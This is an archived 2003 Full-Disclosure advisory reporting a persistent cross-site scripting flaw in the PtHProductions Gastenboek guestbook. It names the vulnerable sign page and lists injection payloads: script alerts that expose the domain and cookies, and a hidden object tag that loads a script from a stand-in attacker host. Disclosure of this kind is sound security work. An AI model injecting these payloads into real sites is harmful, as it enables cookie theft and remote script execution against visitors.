[Full-Disclosure] PtHProductions Gastenboek - XSS

From: morning_wood (se_cur_ityat_private)
Date: Mon Sep 01 2003 - 09:57:43 PDT

Next message: morning_wood: "[Full-Disclosure] Ifriends payment bypass"

Previous message: Redaktion-Kryptocrew: "[Full-Disclosure] [Update]:Cross Site Scripting in Webbased Virusencyclopedia has fixed"
Messages sorted by: [ date ] [ thread ] [ subject ] [ author ]

------------------------------------------------------------------
          - EXPL-A-2003-022 exploitlabs.com Advisory 022
------------------------------------------------------------------
                -= PtHProductions Gastenboek =-


Donnie Werner
Aug, 29 2003


Vunerability(s):
----------------
1. Persistant XSS injection


Product:
--------
PtHProductions Gastenboek


Description of product:
-----------------------
Guestbook for / by www.pthproductions.be


VUNERABILITY / EXPLOIT
======================
message and name fields allows XSS injection

view - Bekijk gastenboek 
post - Teken gastenboek
 
http://www.pthproductions.be/jongeren/Gastenboek/sign.asp

input XSS of your choice
<SCRIPT>alert(document.domain);</SCRIPT>
<SCRIPT>alert(document.cookie);</SCRIPT>
or
<object style="display:none" data="http://verybad-exploit-url/bad.js"></object>


Local:
------
no

Remote:
-------
yes

Vendor Fix:
-----------
No fix on 0day


Vendor Contact:
---------------
helpdeskat_private 
Concurrent with this advisory


Credits:
--------
Donnie Werner
morning_wood@e2-labs.com
exploited? http://exploitlabs.com 

_______________________________________________
Full-Disclosure - We believe in it.
Charter: http://lists.netsys.com/full-disclosure-charter.html

Next message: morning_wood: "[Full-Disclosure] Ifriends payment bypass"
Previous message: Redaktion-Kryptocrew: "[Full-Disclosure] [Update]:Cross Site Scripting in Webbased Virusencyclopedia has fixed"
Messages sorted by: [ date ] [ thread ] [ subject ] [ author ]

This archive was generated by hypermail 2b30 : Mon Sep 01 2003 - 10:34:02 PDT